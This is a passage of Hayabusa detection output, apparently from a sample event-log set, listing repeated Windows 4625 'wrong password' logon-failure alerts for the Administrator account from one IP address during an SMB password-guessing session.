+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXC3hYI1Gin59gvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.807 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQiozAIr9Jgklmks | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O598IvZRpbdU1liO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xlmYWrAnn3sUNSRk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aAAkO0uOGIq8zVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.968 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 26K4BIpgUbBNWbDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moW3Ts7edqoQ9XeU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8C4d3xE0QkWywbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.086 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1EgYFhtgrcjtcXM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7avpgQeA0KCIme9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFgmt3OEw4cDfPhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.214 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OqITdE5K63nJg9tg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.306 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBs4fYCiprxgDd43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.355 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBD0Q2szeURxMYA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.502 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KPUi2NhPP92Rs3hy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.561 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PrbMf9E0fOuwIB8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.613 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 807zsxQ9WETO9YIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGMJKRYUlmijJV40 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.706 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv33to031A0fQzX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.753 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IT0bzycur7HXFeLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyY2K7tT0HgQ1ZL3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6aexuFPH6FyEZ1bN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o8Iojas6sznqlYUE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U2SnliYkmx59ACSM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:19.971 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2plWY1GZHilHv5Vh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.005 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIfmqihMJdPVz80p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.047 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Odg692Eyde8md0t7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gsQNvf5HkRQnbDul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.134 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: il2DGq3bzfwGuJN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.183 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9OsQFOcIyougrx0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gR8wpQrGYzd4NrBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.282 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFjRsjWXbEPs9m1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wbjudOy3rWefzAIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.360 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Q4gc8keCTv2HeE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.414 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SmsaxHrHYuofUhAH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvhWasTJYmChfsNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.497 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DszGfEo9aua2y5UC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lZPScjxczbrcJuvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucpjxJV4rBXOxy4e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.636 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BmTtDfX05VsKFrON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhWSUkQhv089RSfJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.729 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8RXCiXQYgjuPO78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.773 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfB3u3Np38FOw6hc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9GcSmto4jdCIw6H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HsogJdHUcldt7JeH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IUbkohKtCy6joOBY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:20.954 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9ZFyYxBrKnz652Co | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.001 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQ2MHr71xALFHJqN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgjHOgEYRLQiJX75 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXLjSNCeDAaX4ttQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.137 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np6hwdqnWLJawVn9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: adqqChrYx3lZ0BAa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1GTXkOnNYTws1MiC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.266 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QUvFvCM6AJhKjXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.304 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NiVgC8oJ5W2Xr3t0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hXfhdrbLnNOGDqy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcjMGbrHQHxIhSSh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDYPTYHHKAe39GjM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.481 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PF3H6LE6MqFjVWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.526 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LLTReOoxRa7UAhT3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqtqwAPBiBfaHNpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.619 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmisFXzDpOILUhIX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.737 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W5UHqVVAYK08FWit | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.785 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKHLHN59FDnD92Sm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.829 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ohAKPRGvg1JCQ91y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.879 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxdcrng84HEG39nJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.926 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lFGXFxHPbxDTGmiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:21.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tyFnafBgzoLQWTQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2IjLjxkd2pX4moFy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9vqYC4KotCYTcQv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qtHcYFIOHglQFb60 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmiHIQrpsAVRJtdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4TdkChjMAviJ6jr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.283 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPIGU1rBk0F5cG9P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.329 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ScynGWKK3CtoUsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.373 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0E4JAuxC8MuuGfnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4aDJtqsUWKyuDqBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:22.469 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCFrEHUgqCtKPybS | IP Addr: 192.168.198.149 | AuthPackage: 